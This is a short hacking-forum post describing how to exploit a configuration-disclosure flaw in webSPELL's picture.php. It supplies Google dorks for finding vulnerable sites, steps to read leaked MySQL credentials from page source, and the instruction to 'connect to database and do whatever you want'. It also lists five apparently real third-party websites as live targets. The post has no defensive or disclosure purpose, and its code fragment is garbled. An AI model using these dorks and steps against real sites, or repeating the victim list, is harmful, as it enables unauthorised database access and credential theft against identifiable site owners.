Main » Articles » Web Hacking » Exploits and Vulenrablities

webShell remote Configuration excution
Vulnerable URL: http://website.com/picture.php?file=_mysql.php
             
Dorks 
ext:php intitle:webSPELL v4.0
"inurl:/picture.php?file="
Find  vulnerable website and Goto  http://website.com/picture.php?file=_mysql.php
you'll get a Blank Page 
Press Ctrl+U and View Source 
you'll find something like this 

[code]{php}evaL(base64_decode(')[/code]

Now connect to database and do whatever you want
Live demo 
http://www.echoes-guild.com/picture.php?file=_mysql.php
http://www.crazyfungamer.de/picture.php?file=_mysql.php 
http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php
http://r0fld2.uw.hu/picture.php?file=_mysql.php
http://www.street.clanfusion.de/picture.php?file=_mysql.php
Category: Exploits and Vulenrablities | Added by: MaX-HaCker (12.07.11)
Views: 868 | Comments: 1 | Rating: 3.0/2
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2024
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz